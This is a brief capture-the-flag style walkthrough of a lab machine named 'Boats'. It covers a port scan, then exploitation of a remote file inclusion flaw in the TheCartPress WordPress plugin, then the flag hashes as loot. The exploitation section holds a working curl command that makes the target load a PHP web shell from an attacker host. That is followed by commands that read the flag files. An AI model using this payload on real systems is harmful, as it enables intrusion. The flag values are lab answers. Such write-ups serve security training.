Info

  • Name – Boats
  • Address – 172.31.1.14

Enumeration

Open Ports

PortProtocolServiceVersion
80tcphttpApache httpd 2.2.11
135tcpmsrpcMicrosoft Windows RPC
137udpnetbios-nsMicrosoft Windows netbios-ns
139tcpnetbios-ssnMicrosoft Windows netbios-ssn
443tcphttps
445tcpmicrosoft-dsMicrosoft Windows Server 2008 R2 – 2012 microsoft-ds
3306tcpmysqlMySQL
3389tcpms-wbt-server
5985tcphttpMicrosoft HTTPAPI httpd 2.0
47001tcphttpMicrosoft HTTPAPI httpd 2.0
49152tcpmsrpcMicrosoft Windows RPC
49153tcpmsrpcMicrosoft Windows RPC
49154tcpmsrpcMicrosoft Windows RPC
49155tcpmsrpcMicrosoft Windows RPC
49161tcpmsrpcMicrosoft Windows RPC
49163tcpmsrpcMicrosoft Windows RPC
49164tcpmsrpcMicrosoft Windows RPC

Exploitation

Exploit Details

  • Name – WordPress Plugin TheCartPress 1.1.1 – Remote File Inclusion
  • CVE – N/A
  • Module – php/webapps/17860.txt
  • Disclosed – 2011-09-19
  • References
curl 'http://172.31.1.14//wp-content/plugins/thecartpress/checkout/CheckoutEditor.php?tcp_save_fields=true&tcp_class_name=asdf&tcp_class_path=http://10.10.0.15/winshell.php'
whoami
type C:\Users\james\Desktop\access.txt
type C:\Users\Administrator\Desktop\system.txt

Loot

access.txt - 8c9dfcf7863de5e0d58c62488a21f74d
system.txt - 012f2c008bb3f472eef80963f6d359c8